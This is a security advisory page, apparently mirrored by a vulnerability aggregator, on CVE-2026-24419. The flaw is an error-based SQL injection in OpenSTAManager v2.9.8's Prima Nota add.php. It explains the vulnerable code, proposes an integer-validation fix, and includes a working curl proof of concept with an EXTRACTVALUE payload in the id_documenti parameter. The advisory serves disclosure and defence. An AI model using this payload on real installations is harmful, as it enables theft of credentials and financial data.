Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-4j2x-jh4m-fqv6

Опубликовано: 06 фев. 2026
Источник: github
Github: Прошло ревью
CVSS4: 8.7

Описание

OpenSTAManager has a SQL Injection in the Prima Nota module

Summary

Critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages by injecting malicious SQL into URL parameters.

Status: ✅ Confirmed and tested on live instance (v2.9.8) Vulnerable Parameters: id_documenti (GET parameters) Affected Endpoint: /modules/primanota/add.php Attack Type: Error-Based SQL Injection (IN clause)

Details

OpenSTAManager v2.9.8 contains a critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module's add.php file. The application fails to validate that comma-separated values from GET parameters are integers before using them in SQL IN() clauses, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.

Vulnerability Chain:

  1. Entry Point: /modules/primanota/add.php (Lines 63-67)

    $id_documenti = $id_documenti ?: get('id_documenti'); $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];

    Impact: The get() function retrieves user-controlled URL parameters, explode(',', (string) ...) splits them by comma, but NO validation ensures elements are integers.

  2. SQL Injection Point: /modules/primanota/add.php (Line 306)

    $id_anagrafica = $dbo->fetchOne('SELECT idanagrafica FROM co_documenti WHERE id IN('.($id_documenti ? implode(',', $id_documenti) : 0).')')['idanagrafica'];

    Impact: Array elements from $id_documenti are directly concatenated using implode() without type validation or prepare(), enabling full SQL injection.

Root Cause Analysis:

The vulnerability exists because:

  1. get('id_documenti') return user-controlled strings
  2. explode(',', (string) $value) splits by comma but doesn't validate types
  3. implode(',', $array) concatenates array elements directly into SQL
  4. No validation ensures array elements are integers
  5. Attacker can inject SQL by providing: ?id_documenti=1) AND EXTRACTVALUE(...) %23

Affected Code Path:

GET /modules/primanota/add.php?id_documenti=MALICIOUS_PAYLOAD ↓ add.php:63 - $id_documenti = get('id_documenti') ↓ add.php:64 - $id_documenti = explode(',', (string) $id_documenti) [NO TYPE VALIDATION] ↓ add.php:306 - WHERE id IN('.implode(',', $id_documenti).') [INJECTION POINT]

PoC

Step 1: Login

curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \ -d 'username=admin&password=admin'

Step 2: Verify Vulnerability (Error-Based SQL Injection)

Test 1: Extract Database User and Version

curl -b /tmp/cookies.txt "http://localhost:8081/modules/primanota/add.php?id_documenti=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(USER(),'%20|%20',VERSION()))))%23"

Response (error message visible to attacker):

<code>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: &#039;~osm@172.18.0.3 | 8.3.0&#039;</code>
image

Impact

All authenticated users with access to the Prima Nota (Journal Entry) module.

Recommended Fix

Primary Fix - Type Validation:

File: /modules/primanota/add.php

BEFORE (Vulnerable - Lines 63-67):

$id_documenti = $id_documenti ?: get('id_documenti'); $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];

AFTER (Fixed):

$id_documenti = $id_documenti ?: get('id_documenti'); $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : []; // Validate that all array elements are integers $id_documenti = array_map('intval', $id_documenti); $id_documenti = array_filter($id_documenti, fn($id) => $id > 0); // Remove zero/negative IDs

Credits

Discovered by Łukasz Rybak

Ссылки

Пакеты

Наименование

devcode-it/openstamanager

composer
Затронутые версииВерсия исправления

<= 2.9.8

Отсутствует

EPSS

Процентиль: 8%
0.0003
Низкий

8.7 High

CVSS4

CVE ID

CVE-2026-24419

Дефекты

CWE-89

Связанные уязвимости

nvd логотип

CVE-2026-24419

nvd
2 дня назад

OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module's add.php file. The application fails to validate that comma-separated values from the id_documenti GET parameter are integers before using them in SQL IN() clauses, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.

EPSS

Процентиль: 8%
0.0003
Низкий

8.7 High

CVSS4

CVE ID

CVE-2026-24419

Дефекты

CWE-89